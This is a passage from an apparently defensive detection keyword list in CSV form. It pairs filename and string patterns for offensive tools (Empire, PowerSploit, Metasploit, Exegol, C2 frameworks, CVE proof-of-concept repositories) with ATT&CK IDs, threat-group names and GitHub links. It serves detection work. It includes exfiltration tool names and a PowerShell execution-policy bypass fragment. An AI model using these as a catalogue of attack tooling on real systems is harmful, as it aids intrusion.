TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_Syscall_inject.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*Execution_UserExecution_VSSyscallProject.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*-ExecutionPolicy Bypass -File Win10.ps1 *,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,0,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*-ExecutionPolicy Bypass -File Win11.ps1 *,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation 
OS,https://github.com/mandiant/commando-vm,1,0,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*exegol4thewin*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolController.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*exegol-docker-build*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolExceptions.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Exegol-images-main*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation 
tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolManager.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolProgress.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExegolPrompt.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ExeStager.csproj*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*ExeToInjectInTo.*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*ExeToLaunch StringToBePutAsCmdline*,offensive_tool_keyword,FakeCmdLine,Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.,T1059 - T1036,TA0003,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/tree/master/FakeCmdLine,1,0,N/A,N/A,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -*ExetoText.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*ExfilDataToGitHub*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-ExfilDataToGitHub.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ExfilDataToGitHub*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*exfiltrate_via_post.exe*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation 
tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*Exfiltration from DNS finished!*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*Exfiltration from HTTPS finished!*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*Exfiltration.tests.ps1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*existing_auto_target.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exit_nimbo*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*--expected Bad --expected-stop Welcome*,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -*expl-bin*,offensive_tool_keyword,expl-bin,some of my modified exploits and some scripts.,T1210.001 - T1201 - T1059,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/sailay1996/expl-bin,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*explib2_ie11_exec_test_case.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*exploit*wordpress_add_admin*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*exploit.bash*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.bat*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.bin*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.c*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.com*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.exe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,1,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.msi*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.pl*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.ps1*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,1,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.py*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,1,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.reg*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.run*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.sh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation 
tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.vb*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.vbe*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.vbs*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1543 - T1588 - T1211 - T1203,TA0002 - TA0009,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,1,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.vbscript*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*exploit.zsh*,offensive_tool_keyword,POC,CVE POCs exploits executables ,T1068 - T1203 - T1059.003,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation tools,https://github.com/lcashdol/Exploits,1,0,N/A,N/A,3,209,75,2020-07-14T15:41:00Z,2015-02-16T20:06:37Z -*Exploit:Python/CVE*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Malware,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*exploit_frameworks.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*exploit_fuse.c*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation 
tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z -*exploit_kctf.c*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z -*exploit_oneline.md*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/drgreenthumb93/CVE-2022-30190-follina,1,1,N/A,N/A,1,10,4,2023-04-20T20:34:05Z,2022-06-01T11:37:08Z -*exploit_suggester *,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*exploit_suggester.*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*exploit_suggester.py*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*Exploitation Toolkit*,offensive_tool_keyword,PRT,PRET is a new tool for printer security testing developed in the scope of a Masters Thesis at Ruhr University Bochum. It connects to a device via network or USB and exploits the features of a given printer language. Currently PostScript. PJL and PCL are supported which are spoken by most laser printers. This allows cool stuff like capturing or manipulating print jobs. accessing the printers file system and memory or even causing physical damage to the device. All attacks are documented in detail in the Hacking Printers Wiki. The main idea of PRET is to facilitate the communication between the end-user and the printer. Thus. after entering a UNIX-like command. PRET translates it to PostScript. PJL or PCL. sends it to the printer. evaluates the result and translates it back to a user-friendly format. 
PRET offers a whole bunch of commands useful for printer attacks and fuzzing,T1210.001 - T1027.002 - T1003 - T1505 - T1564.001,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Exploitation tools,https://github.com/RUB-NDS/PRT,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*exploit-database-bin-sploits/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*Exploit-JBoss -*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - 
Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-JBoss.ps1*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Exploit-JBoss.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
